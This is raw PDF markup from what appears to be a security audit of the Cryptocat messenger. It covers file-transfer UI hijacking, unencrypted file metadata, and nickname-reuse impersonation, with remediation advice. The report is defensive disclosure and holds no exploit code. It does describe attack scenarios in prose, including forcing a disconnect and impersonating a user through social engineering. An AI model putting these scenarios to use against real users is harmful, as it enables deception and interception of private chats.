BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 705.0236 cm q BT 1 0 0 1 0 50 Tm .701751 Tw 12 TL /F1 10 Tf 0 0 0 rg (Since this is a global replace \(see the ) Tj 0 0 .501961 rg (documentation for replaceWith ) Tj 0 0 0 rg (in ) Tj /F3 10 Tf (jQuery) Tj /F1 10 Tf (\), it affects all file transfer) Tj T* 0 Tw .342485 Tw (elements with the same ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (that are currently visible. Suppose that the victim receiver's client is showing) Tj T* 0 Tw .707984 Tw (the one-to-one chat window for the victim sender, but ) Tj /F4 10 Tf (Cryptocat.addFile ) Tj /F1 10 Tf (is called for a different file) Tj T* 0 Tw .291098 Tw (transfer \(in another chat window\) from the attacker to the same receiver. Then, the UI element in the chat) Tj T* 0 Tw (window for the victim sender will be incorrectly updated to link to the attacker's file.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 663.0236 cm q BT 1 0 0 1 0 26 Tm 2.244651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Because the ) Tj /F3 10 Tf (HTML ) Tj /F1 10 Tf (of the file download link does not contain the ) Tj /F4 10 Tf (file= ) Tj /F1 10 Tf (attribute, any subsequent) Tj T* 0 Tw .655251 Tw (updates of that UI element \(including the one that would normally cause it to link to the correct file when) Tj T* 0 Tw (the targeted transfer completes\) will be ignored.) Tj T* ET Q Q q 1 0 0 1 62.69291 621.0236 cm q BT 1 0 0 1 0 26 Tm .82061 Tw 12 TL /F1 10 Tf 0 0 0 rg (For the same reason, the progress bar may also be incorrectly updated, causing it to "bounce" between) Tj T* 0 Tw .354198 Tw (the values for the two transfers with the same ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (. Similarly, a file transfer error may cause the wrong UI) Tj T* 0 Tw (element to be updated.) Tj T* ET Q Q q 1 0 0 1 62.69291 591.0236 cm q BT 1 0 0 1 0 14 Tm 3.079147 Tw 12 TL /F2 10 Tf 0 0 0 rg (Live Mitigation: ) Tj /F1 10 Tf (The Cryptocat developers have already \(since 2013-11-29\) released a version of) Tj T* 0 Tw (Cryptocat \() Tj 0 0 .501961 rg (v2.1.16) Tj 0 0 0 rg (\) with file transmission disabled, so this issue is already mitigated.) Tj T* ET Q Q q 1 0 0 1 62.69291 513.0236 cm q BT 1 0 0 1 0 62 Tm .00936 Tw 12 TL /F2 10 Tf 0 0 0 rg (Remediation: ) Tj /F1 10 Tf (Ensure that ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (values are always scoped to a particular buddy \(i.e. scoped to a particular) Tj T* 0 Tw .268221 Tw (chat window\). ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (values are chosen by the sender under normal operation but could also be chosen by) Tj T* 0 Tw 1.05528 Tw (the server \(if the server were malicious or had been confused or compromised by an attack\), and ) Tj /F4 10 Tf (sid) Tj T* 0 Tw .272093 Tw /F1 10 Tf (values cannot be assumed to be unique in any scope other than the buddy that ostensibly sent the sid. 
In) Tj T* 0 Tw .782988 Tw (fact, per ) Tj 0 0 .501961 rg (strophejs issue 35) Tj 0 0 0 rg (, ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (values in the future are all going to start at 0 and increment, and then) Tj T* 0 Tw (restart at 0 if that buddy disconnects from and reconnects to the server.) Tj T* ET Q Q q 1 0 0 1 62.69291 495.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (In particular, the global ) Tj /F4 10 Tf (replaceWith ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (Cryptocat.addFile ) Tj /F1 10 Tf (can be removed.) Tj T* ET Q Q q 1 0 0 1 62.69291 495.0236 cm Q endstream endobj % 'R188': class PDFStream 188 0 obj % page stream << /Length 8399 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 747.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue D. File Name, Mimetype, and Size Lack Confidentiality) Tj T* ET Q Q q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-26) Tj T* ET Q Q q 1 0 0 1 62.69291 687.0236 cm q BT 1 0 0 1 0 26 Tm .19061 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The file transfer protocol relies on the ) Tj 0 0 .501961 rg (SI File Transfer) Tj 0 0 0 rg ( ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (protocol extension to transmit file) Tj T* 0 Tw 1.724269 Tw (metadata prior to transfer. These metadata are transmitted outside of ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (and lack its confidentiality) Tj T* 0 Tw (features.) Tj T* ET Q Q q 1 0 0 1 62.69291 657.0236 cm q BT 1 0 0 1 0 14 Tm .139269 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An eavesdropper may discover filenames, ) Tj /F3 10 Tf (MIME ) Tj /F1 10 Tf (types, and sizes of transferred files. 
The privacy) Tj T* 0 Tw (impact of this exposure is quite limited:) Tj T* ET Q Q q 1 0 0 1 62.69291 651.0236 cm Q q 1 0 0 1 62.69291 651.0236 cm Q q 1 0 0 1 62.69291 627.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.24229 Tw (Filenames are currently randomly generated for each transfer and not associated with the original) Tj T* 0 Tw (source file.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 621.0236 cm Q q 1 0 0 1 62.69291 597.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.893318 Tw 12 TL /F3 10 Tf 0 0 0 rg (MIME ) Tj /F1 10 Tf (types are restricted to images and zipfiles, so attackers only learn which of these two) Tj T* 0 Tw (categories a file is in.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 591.0236 cm Q q 1 0 0 1 62.69291 579.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Sizes are in exact bytes, but the size is revealed in any case by the length of the file ciphertext.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 579.0236 cm Q q 1 0 0 1 62.69291 549.0236 cm q BT 1 0 0 1 0 14 Tm .049985 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (An attacker must have access to the ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (traffic \(or the container protocol traffic: ) Tj /F3 10 Tf (BOSH ) Tj /F1 10 Tf (and) Tj T* 0 Tw /F3 10 Tf (HTTP) Tj /F1 10 Tf (\). 
This access is possible through several vectors:) Tj T* ET Q Q q 1 0 0 1 62.69291 543.0236 cm Q q 1 0 0 1 62.69291 543.0236 cm Q q 1 0 0 1 62.69291 519.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.204597 Tw (A server compromise \(including malicious insiders\) could allow live traffic sniffing to recover these) Tj T* 0 Tw (messages.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 513.0236 cm Q q 1 0 0 1 62.69291 501.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (A server host compromise may grant access to log files containing recorded messages.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 495.0236 cm Q q 1 0 0 1 62.69291 483.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Browser logs or caches may contain recorded messages.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 477.0236 cm Q q 1 0 0 1 62.69291 453.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 1.24229 Tw 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is deployed \(including the production ) Tj /F3 10 Tf (crypto.cat ) Tj /F1 10 Tf (service\), an active ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (attack against) Tj T* 0 Tw /F3 10 Tf (TLS ) Tj /F1 10 Tf (protected servers could be used to leverage this attack.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 447.0236 cm Q q 1 0 0 1 62.69291 435.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is ) Tj /F3 10 Tf (not ) Tj /F1 10 Tf (used, this attack is feasible at an unknown number of routers on the Internet.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 435.0236 cm Q q 1 0 0 1 62.69291 405.0236 cm q BT 1 0 0 1 0 14 Tm 1.987126 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (We verified this issue by using Chrome's developer console to view the IBB messages) Tj T* 0 Tw (transmitted over HTTPS, for example:) Tj T* ET Q Q q 1 0 0 1 62.69291 222.2617 cm q q .96447 0 0 .96447 0 0 cm q 1 0 0 1 6.6 6.843137 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 486 180 re B* Q q BT 1 0 0 1 0 158 Tm 12 TL /F7 10 Tf 0 .501961 0 rg (<) Tj (body) Tj /F4 10 Tf 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (rid=) Tj .729412 .129412 .129412 rg ("3814497183") Tj 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (sid=) Tj .729412 .129412 .129412 rg ("e58708cb6438d43ffe6732dcd3ff855f1d690978") Tj 0 0 0 rg T* ( ) Tj .490196 .564706 .160784 rg (xmlns=) Tj .729412 .129412 .129412 rg ("http://jabber.org/protocol/httpbind") Tj /F7 10 Tf 0 .501961 0 rg (>) Tj /F4 10 Tf 0 0 0 rg T* ( ) Tj /F7 10 Tf 0 .501961 0 rg (<) Tj (iq) Tj /F4 10 Tf 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (id=) Tj .729412 .129412 .129412 rg ("3075:si-filetransfer") Tj 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (to=) Tj .729412 .129412 .129412 rg ("cryptocataudit@conference.crypto.cat/daira") Tj 0 0 0 rg T* ( ) Tj .490196 .564706 .160784 rg (type=) Tj .729412 .129412 .129412 rg ("set") Tj 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (xmlns=) Tj .729412 .129412 .129412 rg ("jabber:client") Tj /F7 10 Tf 0 .501961 0 rg (>) Tj /F4 10 Tf 0 0 0 rg T* ( ) Tj /F7 10 Tf 0 .501961 0 rg 
(<) Tj (si) Tj /F4 10 Tf 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (id=) Tj .729412 .129412 .129412 rg ("3074") Tj 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (mime-type=) Tj .729412 .129412 .129412 rg ("application/zip") Tj 0 0 0 rg T* ( ) Tj .490196 .564706 .160784 rg (profile=) Tj .729412 .129412 .129412 rg ("http://jabber.org/protocol/si/profile/file-transfer") Tj 0 0 0 rg T* ( ) Tj .490196 .564706 .160784 rg (xmlns=) Tj .729412 .129412 .129412 rg ("http://jabber.org/protocol/si") Tj /F7 10 Tf 0 .501961 0 rg (>) Tj /F4 10 Tf 0 0 0 rg T* ( ) Tj /F7 10 Tf 0 .501961 0 rg (<) Tj (file) Tj /F4 10 Tf 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (name=) Tj .729412 .129412 .129412 rg ("229f1c684a5324e50fd5c03b996f8d87.zip") Tj 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (size=) Tj .729412 .129412 .129412 rg ("158") Tj 0 0 0 rg T* ( ) Tj .490196 .564706 .160784 rg (xmlns=) Tj .729412 .129412 .129412 rg ("http://jabber.org/protocol/si/profile/file-transfer") Tj /F7 10 Tf 0 .501961 0 rg (/) Tj (>) Tj /F4 10 Tf 0 0 0 rg T* ( [...]) Tj T* ( ) Tj /F7 10 Tf 0 .501961 0 rg (<) Tj (/si) Tj (>) Tj /F4 10 Tf 0 0 0 rg T* ( ) Tj /F7 10 Tf 0 .501961 0 rg (<) Tj (/iq) Tj (>) Tj /F4 10 Tf 0 0 0 rg T* ( [...]) Tj T* /F7 10 Tf 0 .501961 0 rg (<) Tj (/body) Tj (>) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 202.2617 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Suggested Remediation: ) Tj /F1 10 Tf (In any newly designed file transfer protocol, ensure that metadata is encrypted.) Tj T* ET Q Q q 1 0 0 1 62.69291 202.2617 cm Q endstream endobj % 'R189': class PDFStream 189 0 obj % page stream << /Length 7380 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 21 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue E. 
You Log Out, Attacker Logs in with the same Nickname,) Tj T* (Your Friend Thinks The Attacker is You) Tj T* ET Q Q q 1 0 0 1 62.69291 711.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-26) Tj T* ET Q Q q 1 0 0 1 62.69291 681.0236 cm q BT 1 0 0 1 0 14 Tm .864104 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis:) Tj /F1 10 Tf ( ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (uses an identification model in which a client that knows the name of a channel is) Tj T* 0 Tw (able to log in to that channel and claim any unused nickname.) Tj T* ET Q Q q 1 0 0 1 62.69291 651.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .334198 Tw (Users may believe that an attacker using a given nickname is the same party as the previous user of that) Tj T* 0 Tw (nickname.) Tj T* ET Q Q q 1 0 0 1 62.69291 597.0236 cm q BT 1 0 0 1 0 38 Tm 2.141163 Tw 12 TL /F1 10 Tf 0 0 0 rg (This risk is intended to be mitigated by the use of the Socialist Millionaire Protocol \() Tj /F3 10 Tf (SMP) Tj /F1 10 Tf (\). Within a) Tj T* 0 Tw 2.237633 Tw (pairwise session between two users, it is possible to use the ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (to verify shared knowledge of a) Tj T* 0 Tw 1.923555 Tw (prearranged secret. However, a pair of users who wished to authenticate all of their communications) Tj T* 0 Tw (would need to repeat the ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (on ) Tj /F3 10 Tf (every ) Tj /F1 10 Tf (pairwise session between those users.) Tj T* ET Q Q q 1 0 0 1 62.69291 567.0236 cm q BT 1 0 0 1 0 14 Tm .107882 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(A "pairwise session" in this sense ends when either user logs out. 
It is not the same as the ) Tj /F3 10 Tf (Diffie-Hellman) Tj T* 0 Tw /F1 10 Tf (sessions involved in Issues A and B.\)) Tj T* ET Q Q q 1 0 0 1 62.69291 477.0236 cm q 0 0 0 rg BT 1 0 0 1 0 74 Tm /F1 10 Tf 12 TL 1.645318 Tw (This issue could be exacerbated if the attacker observes the session status, for example, an attacker) Tj T* 0 Tw 1.401235 Tw (could watch the status of the \(encrypted\) conversation between Alice and Bob, then see that Bob has) Tj T* 0 Tw 1.162927 Tw (logged out, then log in and choose the nickname "Bob", then initiate a conversation with Alice and say) Tj T* 0 Tw .778735 Tw (\223One more thing\205\224. The timing of the initiation of the new session, and the natural-sounding \223One more) Tj T* 0 Tw 1.705318 Tw (thing\205\224 would trigger Alice's social response to a resumed conversation and may make her forget to) Tj T* 0 Tw 1.525542 Tw (question whether this is a different user. This is an example of using social engineering as part of an) Tj T* 0 Tw (attack.) Tj T* ET Q Q q 1 0 0 1 62.69291 399.0236 cm q BT 1 0 0 1 0 62 Tm 1.926098 Tw 12 TL /F1 10 Tf 0 0 0 rg (Another way this issue could be exacerbated is if the attacker can force a user to disconnect. If the) Tj T* 0 Tw 2.045433 Tw (attacker controls the Cryptocat server, can Man-In-The-Middle the ) Tj /F3 10 Tf (HTTP\(S\) ) Tj /F1 10 Tf (connections between the) Tj T* 0 Tw 1.772209 Tw (clients and the server, or can use a Denial-of-Service attack on one of the clients, they can cause a) Tj T* 0 Tw 1.129982 Tw (disconnect. For example, an attacker could observe an \(encrypted\) conversation in progress, force one) Tj T* 0 Tw .709985 Tw (party to disconnect from the Cryptocat server, log in and choose the nickname that party was previously) Tj T* 0 Tw (using, establish a session with the other party, and then say \223Sorry. What were you saying?\224.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 357.0236 cm q BT 1 0 0 1 0 26 Tm 2.424651 Tw 12 TL /F1 10 Tf 0 0 0 rg (This issue is exacerbated by the wording of login messages. Suppose that Alice performs an ) Tj /F3 10 Tf (SMP) Tj T* 0 Tw .806235 Tw /F1 10 Tf (verification with Bob; then Bob logs out and someone claiming the nickname "Bob" logs in. Alice's client) Tj T* 0 Tw (will display this to her as "Bob logged in.", but there is no assurance that this is the same Bob.) Tj T* ET Q Q q 1 0 0 1 62.69291 255.0236 cm q BT 1 0 0 1 0 86 Tm .53528 Tw 12 TL /F1 10 Tf 0 0 0 rg (Using ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (to gain assurance of the identity of the counterparty is inconvenient. Each run of the protocol) Tj T* 0 Tw 2.967485 Tw (requires 6 mouse clicks and entry of the secret question and answer from the initiating user; the) Tj T* 0 Tw 1.854985 Tw (responding user needs to answer the question and make 2 mouse clicks. The initiating user gets an) Tj T* 0 Tw .056905 Tw (indication that the protocol succeeded, but the responding user does not. Therefore, mutual authentication) Tj T* 0 Tw .45104 Tw (requires at least 8 mouse clicks in each session from both users, plus one entry of a secret question and) Tj T* 0 Tw .421984 Tw (two entries of a secret answer from both users, plus any out-of-band communication and thought needed) Tj T* 0 Tw 1.050651 Tw (to agree on the question and answer. This assumes that the authentication succeeds in both directions) Tj T* 0 Tw (first time, and does not need to be retried.) Tj T* ET Q Q q 1 0 0 1 62.69291 225.0236 cm q BT 1 0 0 1 0 14 Tm .653516 Tw 12 TL /F1 10 Tf 0 0 0 rg (After the initial dialog in the initiator's client confirming that ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (has succeeded, there is no indication in) Tj T* 0 Tw (the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (user interface that a successful ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (run has been completed with a given user.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 195.0236 cm q BT 1 0 0 1 0 14 Tm 1.320574 Tw 12 TL /F1 10 Tf 0 0 0 rg (Note that temporary network outages may also cause users to log out and then in again. Under some) Tj T* 0 Tw (conditions, this could be sufficiently frequent to make it impractical to run ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (on each pairwise session.) Tj T* ET Q Q q 1 0 0 1 62.69291 165.0236 cm q BT 1 0 0 1 0 14 Tm .063059 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Observations of the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (user interface during experiments in which different clients log) Tj T* 0 Tw (in with the same nickname.) Tj T* ET Q Q q 1 0 0 1 62.69291 147.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Suggested Mitigations/Remediations:) Tj T* ET Q Q q 1 0 0 1 62.69291 141.0236 cm Q q 1 0 0 1 62.69291 141.0236 cm Q q 1 0 0 1 62.69291 117.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.556235 Tw (Change the login message from "Bob logged in." to "Someone logged in and chose to be called) Tj T* 0 Tw ('Bob'.") Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 111.0236 cm Q q 1 0 0 1 62.69291 99.02362 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Distinguish nicknames of users that have completed ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (in the current pairwise session.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 93.02362 cm Q endstream endobj % 'R190': class PDFStream 190 0 obj % page stream << /Length 3137 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 729.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm .706651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Try to reduce the inconvenience of performing ) Tj /F3 10 Tf (SMP) Tj /F1 10 Tf (. For example, in principle it should be possible) Tj T* 0 Tw .348735 Tw (to achieve mutual authentication with a single run of ) Tj /F3 10 Tf (SMP) Tj /F1 10 Tf (. \(A complicating factor is that the initiating) Tj T* 0 Tw (user is able to choose the question, which may give an attacker an advantage.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 723.0236 cm Q q 1 0 0 1 62.69291 687.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.628443 Tw (Consider changing the identification model to give clients more persistent keys. This would allow) Tj T* 0 Tw .132209 Tw (implementing the option for a user to "pin" a nickname to a given public key. For privacy reasons this) Tj T* 0 Tw (would need to be an explicit user action, and it would need to be possible to delete pinnings.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 681.0236 cm Q q 1 0 0 1 62.69291 633.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm 1.817984 Tw 12 TL /F1 10 Tf 0 0 0 rg (Consider assigning random nicknames every time on join. 
This is done by Google to manage a) Tj T* 0 Tw 1.46816 Tw (similar identification issue \227 unauthenticated users connecting to a shared resource \() Tj 0 0 .501961 rg (anonymous) Tj T* 0 Tw 1.099984 Tw (animals in Google Drive) Tj 0 0 0 rg (\). This might fit in well with ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf ('s branding; ) Tj /F3 10 Tf (users could be assigned) Tj T* 0 Tw (cute cat names and icons) Tj /F1 10 Tf (!) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 627.0236 cm Q q 1 0 0 1 62.69291 591.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.98784 Tw (Consider preventing the same nickname from being reused with a different public key for some) Tj T* 0 Tw .373318 Tw (timeout period. \(This would occasionally cause false positives, e.g. if a user reloads Cryptocat and it) Tj T* 0 Tw (generates a new key pair, they would have to pick a new nickname temporarily.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 591.0236 cm Q q 1 0 0 1 62.69291 561.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .08311 Tw (We also suggest performing a user study to investigate the assumptions that users have about the current) Tj T* 0 Tw (interface and any intended changes.) Tj T* ET Q Q q 1 0 0 1 62.69291 561.0236 cm Q endstream endobj % 'R191': class PDFStream 191 0 obj % page stream << /Length 2899 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 747.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue F. 
Nicknames Can Be Invisibly Reassigned) Tj T* ET Q Q q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-26) Tj T* ET Q Q q 1 0 0 1 62.69291 675.0236 cm q BT 1 0 0 1 0 38 Tm .857608 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (A user may see no sign at all of an Issue E attack: in the window for one-to-one chat with a) Tj T* 0 Tw .712619 Tw (specific buddy, there is no indication when a buddy has logged out. Therefore, if a user is looking at the) Tj T* 0 Tw .382209 Tw (one-to-one chat, there is no way for them to know that the session for which ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (succeeded has ended.) Tj T* 0 Tw (In fact, an attacker may be able to force it to end.) Tj T* ET Q Q q 1 0 0 1 62.69291 633.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 6.346136 Tw (A suspicious and diligent user could discover the reassignment by switching back to the) Tj T* 0 Tw .298314 Tw (main-conversation window and scanning the conversational transcript for the relevant notifications of their) Tj T* 0 Tw (buddy parting and joining, potentially buried among chitchat and other events.) Tj T* ET Q Q q 1 0 0 1 62.69291 603.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .567356 Tw (There is potentially also an audio notification when any buddy joins or leaves, but this is not specific to a) Tj T* 0 Tw (particular buddy, and may be switched off or otherwise not audible.) Tj T* ET Q Q q 1 0 0 1 62.69291 573.0236 cm q BT 1 0 0 1 0 14 Tm .099269 Tw 12 TL /F1 10 Tf 0 0 0 rg (This vulnerability could also potentially allow an attacker to get away with performing a Man-In-The-Middle) Tj T* 0 Tw (attack that is interrupted just during an ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (protocol run, in order to allow ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (to succeed.) 
